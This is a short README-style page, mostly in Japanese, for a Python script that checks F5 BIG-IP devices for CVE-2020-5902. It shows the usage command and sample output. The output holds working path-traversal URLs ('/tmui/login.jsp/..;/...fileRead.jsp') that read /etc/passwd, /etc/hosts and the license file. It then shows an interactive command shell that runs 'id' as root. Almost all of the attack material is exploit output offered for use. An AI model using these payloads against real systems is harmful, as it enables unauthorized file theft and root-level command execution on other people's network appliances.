
CVE-2020-5902(F5 BIG-IPデバイス)をチェックするPythonスクリプト。
CVE-2020-5902(F5 BIG-IP デバイス)をチェックする Python スクリプト。
python3 CVE-2020-5902.py -i <IP>
- Python script to check CVE-2020-5902 (F5 BIG-IP devices). | coded by Abdullah AlZahrani
[!] ターゲット: 127.0.0.1
[I] /etc/passwd 読み取り可能
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
[I] /etc/hosts 読み取り可能
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
[I] /config/bigip.license 読み取り可能
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
[I] ターゲットは CVE-2020-5902 に対して脆弱です
[*] ターゲットが RCE に対して脆弱かどうかを確認中
[#] ターゲットは RCE に対して脆弱です。実行します。
Command > id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0